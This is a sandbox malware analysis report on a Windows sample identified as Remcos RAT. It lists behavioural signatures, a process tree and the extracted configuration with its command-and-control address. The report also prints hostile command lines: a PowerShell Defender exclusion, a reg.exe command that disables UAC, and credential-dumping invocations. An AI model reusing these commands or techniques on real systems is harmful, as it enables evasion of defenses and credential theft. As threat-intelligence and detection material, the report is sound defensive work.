Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IB9876789000.bat.exe

Overview

General Information

Sample name:IB9876789000.bat.exe
Analysis ID:1570827
MD5:f443c222255e35ee6dd0e194360c23ce
SHA1:a8c84df31a575ab84e6255b89351ce877c9619c8
SHA256:7053c8d9983dc949e5d559ba1b006b8ba9c059a23e06cd87c857c3d04201381b
Tags:exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Disables UAC (registry)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses regedit.exe to modify the Windows registry
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • IB9876789000.bat.exe (PID: 1220 cmdline: "C:\Users\user\Desktop\IB9876789000.bat.exe" MD5: F443C222255E35EE6DD0E194360C23CE)
    • conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7424 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • regedit.exe (PID: 1900 cmdline: "C:\Windows\regedit.exe" MD5: 999A30979F6195BF562068639FFC4426)
    • wmplayer.exe (PID: 7172 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)
      • wmplayer.exe (PID: 7492 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej" MD5: A7790328035BBFCF041A6D815F9C28DF)
      • wmplayer.exe (PID: 7500 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej" MD5: A7790328035BBFCF041A6D815F9C28DF)
      • wmplayer.exe (PID: 7512 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\luyrhxabazosxcocxvflpvzau" MD5: A7790328035BBFCF041A6D815F9C28DF)
      • wmplayer.exe (PID: 7528 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\wwdciplcohgxhqkohgsnsamrdphe" MD5: A7790328035BBFCF041A6D815F9C28DF)
    • wmplayer.exe (PID: 7180 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)
    • WerFault.exe (PID: 7288 cmdline: C:\Windows\system32\WerFault.exe -u -p 1220 -s 1600 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["192.210.150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000002.4568587228.0000000000D6F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 31 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              6.2.wmplayer.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                6.2.wmplayer.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  6.2.wmplayer.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    6.2.wmplayer.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aaf8:$a1: Remcos restarted by watchdog!
                    • 0x6b070:$a3: %02i:%02i:%02i:%03i
                    6.2.wmplayer.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x64e04:$str_b2: Executing file:
                    • 0x65c3c:$str_b3: GetDirectListeningPort
                    • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x65780:$str_b7: \update.vbs
                    • 0x64e2c:$str_b9: Downloaded file:
                    • 0x64e18:$str_b10: Downloading file:
                    • 0x64ebc:$str_b12: Failed to upload file:
                    • 0x65c04:$str_b13: StartForward
                    • 0x65c24:$str_b14: StopForward
                    • 0x656d8:$str_b15: fso.DeleteFile "
                    • 0x6566c:$str_b16: On Error Resume Next
                    • 0x65708:$str_b17: fso.DeleteFolder "
                    • 0x64eac:$str_b18: Uploaded file:
                    • 0x64e6c:$str_b19: Unable to delete:
                    • 0x656a0:$str_b20: while fso.FileExists("
                    • 0x65349:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 41 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IB9876789000.bat.exe", ParentImage: C:\Users\user\Desktop\IB9876789000.bat.exe, ParentProcessId: 1220, ParentProcessName: IB9876789000.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, ProcessId: 2228, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IB9876789000.bat.exe", ParentImage: C:\Users\user\Desktop\IB9876789000.bat.exe, ParentProcessId: 1220, ParentProcessName: IB9876789000.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, ProcessId: 2228, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IB9876789000.bat.exe", ParentImage: C:\Users\user\Desktop\IB9876789000.bat.exe, ParentProcessId: 1220, ParentProcessName: IB9876789000.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, ProcessId: 2228, ProcessName: powershell.exe

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Media Player\wmplayer.exe, ProcessId: 7172, TargetFilename: C:\ProgramData\remcos\logs.dat

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-08T08:42:10.005853+010020327761Malware Command and Control Activity Detected192.168.2.549717192.210.150.263678TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-08T08:42:11.112791+010020327771Malware Command and Control Activity Detected192.210.150.263678192.168.2.549717TCP
                    2024-12-08T08:44:14.205921+010020327771Malware Command and Control Activity Detected192.210.150.263678192.168.2.549717TCP
                    2024-12-08T08:46:14.509273+010020327771Malware Command and Control Activity Detected192.210.150.263678192.168.2.549717TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-08T08:42:13.381508+010028033043Unknown Traffic192.168.2.549720178.237.33.5080TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
                    Multi AV Scanner detection for submitted file
                    Source: IB9876789000.bat.exeReversingLabs: Detection: 42%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.4568587228.0000000000D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: IB9876789000.bat.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,6_2_0043293A
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_6a79849f-c

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00406764 _wcslen,CoGetObject,6_2_00406764
                    Source: IB9876789000.bat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdbH source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.pdb0 source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Management.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Management.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Management.pdbH source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdbh source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0040B335
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0041B42F
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_2_0040B53A
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0044D5E9 FindFirstFileExA,6_2_0044D5E9
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,6_2_004089A9
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00406AC2 FindFirstFileW,FindNextFileW,6_2_00406AC2
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_00407A8C
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,6_2_00418C69
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,6_2_00408DA7
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_100010F1
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_10006580 FindFirstFileExA,6_2_10006580
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_2_00406F06

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49717 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 192.210.150.26:3678 -> 192.168.2.5:49717
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorIPs: 192.210.150.26
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 192.210.150.26 192.210.150.26
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49720 -> 178.237.33.50:80
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040455B WaitForSingleObject,SetEvent,recv,6_2_0040455B
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: wmplayer.exe, 00000006.00000002.4568924546.0000000004CF0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: wmplayer.exe, 0000000D.00000003.2208934536.00000000035CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
